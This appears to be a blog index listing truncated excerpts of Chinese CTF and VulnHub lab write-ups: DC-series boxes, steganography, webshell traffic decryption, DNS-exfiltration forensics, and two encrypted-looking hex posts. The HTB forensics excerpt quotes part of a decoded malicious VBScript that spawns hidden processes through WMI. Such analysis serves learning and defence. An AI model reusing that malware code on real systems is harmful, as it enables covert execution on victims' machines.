w3nx1z1

vulnhub靶场DC-9靶场描述DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I ...

c6f30f10fe84f9901328b9fc8679cdabdc2f2e33d952738b21df3a25035a817f2db66e70f5663bbcb04124ac4fe286c5af903de1e43bc3a9f18346d59ed80a2f140db381d2661746806af99397576a05d032222a402675c6355c690ce5147338e9fa213452483c4dfee89289cbf817d3b0ffec039b10448e387c96e7f4fd37cc6e63ff9663754ba01064e3d86b969881ad0f3d941425a24117ab03cefb11e55a78022352c6f4a09ff92427eaf937442baaf8c739dc304582f1a36406270666b8ebbe1bf8b9cbb572d7e92e2a488abfc52e461df883f07954f3735c1643ac1ed767dc1cd6746221a277c56b5d70e672412733f8e85f69126e7 ...

1b785cf2658ff90bf27d7487a5703c7766be79956d5b9d48e086a1774570dd7a86003112bcbe362708e7137d932e9e7970ce573a062075956828b5e84c69bbe0bb5404f73d0b26d826dd4278cd8afbc90e96d377a6f40dc9caeca0b80036e2af4027e8483dcd95071a4d419abf96432a8d0ec18dfc66d694954deae96e2e602267f956fb7714dbdc06291074ab13230732163275748cdffddbbd006ad40ddee521b0efe02f79a9a160ff3fcdc015660542d66309d671329b203dc07367ad67327e3b52f1f992fbbfa57bad50e945d64b4bd00fd6bafed83e64a7c2d0e975ec3d68e7142e94866f4db396c9b09cead0bdd8410f95c515630f3 ...

vulnhub靶场DC-8靶场描述DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited. The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-fact ...

2023极客大挑战miscDEATH_N0TE(图片放缩)题目说有两部分flag 且隐写信息极多 那就好说多了 直接考虑图片隐写 使用010editor在图片尾找到一串字符 进行base解码 "你找到了一本《DEATH NOTE》，好奇心驱使你翻开这本笔记，你阅读了使用规则，但是你惊讶地发现刚才的规则之中唯独没有第10条..." "你再次去确认是否如此，笔记上的文字却仿佛活了起来，在你眼中不断地放大缩小，你闭上了双眼..." "原本黑色的文字一转变成血红色，诡异的画面还是出现于你的视网膜前，你决定不再纠结于遗失的规则，幻觉消失了..." 既然是png文件 在考虑一下lsb隐写 一看这幅死样子 果然有问题 提取一下信息 在r g b三通道的0位 又是一串base编码 解码 得到第一部分flag "你继续观察手上漆黑色的笔记本，冷静下来的你发现了藏在封面最下边的一行小字:SYC{D4@Th_N0t4_" "你浏览过整个笔记本，可惜全是空白页，其中有一页不知道被谁撕掉了，你最终还是 ...

vulnhub靶场DC-7靶场描述DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won&# ...

NKCTF2024Miscwebshell_pro(AES解密 webshell)追踪tcp流 在流9中发现一段长字符 解两次base64 是一个RSA加密脚本 直接chat跑一下 改个解密脚本 import base64 import libnum from Crypto.PublicKey import RSA pubkey = """-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCK/qv5P8ixWjoFI2rzF62tm6sDFnRsKsGhVSCuxQIxuehMWQLmv6TPxyTQPefIKufzfUFaca/YHkIVIC19ohmE5X738TtxGbOgiGef4bvd9sU6M42k8vMlCPJp1woDFDOFoBQpr4YzH4ZTR6Ps+HP8VEIJMG5uiLQOLxdKdxi41QIDAQAB -----END PUBLIC KEY----- """ prikey = "" ...

HTBCyberCTF2024Forensics(部分)Urgent给的附件是一个xml文件 直接notepad打开 解base64 document.write(unescape(' >_ 404 Not Found Sub window_onload const impersonation = 3 Const HIDDEN_WINDOW = 12 Set Locator = CreateObject("WbemScripting.SWbemLocator") Set Service = Locator.ConnectServer() Service.Security_.ImpersonationLevel=impersonation Set objStartup = Service.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ Set Process = Service.Get("Win32_Process") ...

2023年中国工业互联网安全大赛决赛-misc刷csdn看到了这个比赛 顺手下了附件也来做一做 DNS_Query(DNS流量提取数据 二维码)拿到一个dns流量 看到info里面有东西 但是每两条里面的info都是一样的 那我们先过滤一下 frame.len == 142 写tshark语句把里面的信息提取出来 tshark -r DNS_Query.pcapng -T fields -Y "frame.len == 142" -e "dns.qry.name" | awk '{print substr($0,0,29)}' | tr -d '\n' >data.txt -Y 是筛选数据包 -e 由上图可以看到我们想要提取的数据是在queries的name字段的 awk 对提取出来的文本进行处理 提取从第一个字符开始的连续29个字符 这里我们只需要数字部分 tr 进一步处理将每行后面的换行符去掉 猜测这段字符是二维码 写脚本进行转化 from PIL import Imag ...

vulnhub靶场DC-6靶场描述DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can a ...